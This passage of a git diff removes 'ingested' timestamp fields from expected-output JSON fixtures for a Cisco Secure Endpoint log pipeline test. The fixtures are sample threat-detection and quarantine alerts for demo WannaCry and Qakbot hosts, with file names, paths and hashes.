Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 
@@ -7704,7 +7610,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212802831Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":798000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 
@@ -7794,7 +7699,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212803652Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":767000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 
@@ -7884,7 +7788,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212804456Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 
@@ -7974,7 +7877,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212805282Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":735000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 
@@ -8068,7 +7970,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212806090Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "severity": 2 
@@ -8161,7 +8062,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:52:43.212806893Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json index 6fc2b418ae4..968ba341732 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json 
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json @@ -48,7 +48,6 @@ ], "code": "1090519054", "id": "6419275394960065000", - "ingested": "2022-02-02T05:53:05.376854691Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":96000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "severity": 2 
@@ -147,7 +146,6 @@ ], "code": "2164260880", "id": "6419275390665097000", - "ingested": "2022-02-02T05:53:05.376858237Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":862000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 
@@ -223,7 +221,6 @@ ], "code": "2164260880", "id": "6419275390665097000", - "ingested": "2022-02-02T05:53:05.376859420Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":659000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 
@@ -297,7 +294,6 @@ ], "code": "1090519054", "id": "6419275390665097000", - "ingested": "2022-02-02T05:53:05.376860672Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":831000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 
@@ -387,7 +383,6 @@ ], "code": "1090519054", "id": "6419275390665097000", - "ingested": "2022-02-02T05:53:05.376861794Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":706000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "severity": 2 
@@ -490,7 +485,6 @@ ], "code": "1090519054", "id": "6419275390665097000", - "ingested": "2022-02-02T05:53:05.376862869Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "severity": 2 
@@ -587,7 +581,6 @@ ], "code": "553648143", "id": "6419275390665097000", - "ingested": "2022-02-02T05:53:05.376864016Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 
@@ -663,7 +656,6 @@ ], "code": "2164260880", "id": "6411525251028484000", - "ingested": "2022-02-02T05:53:05.376865068Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "severity": 2 
@@ -737,7 +729,6 @@ ], "code": "1090519054", "id": "6411525251028484000", - "ingested": "2022-02-02T05:53:05.376866209Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":214000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "severity": 2 
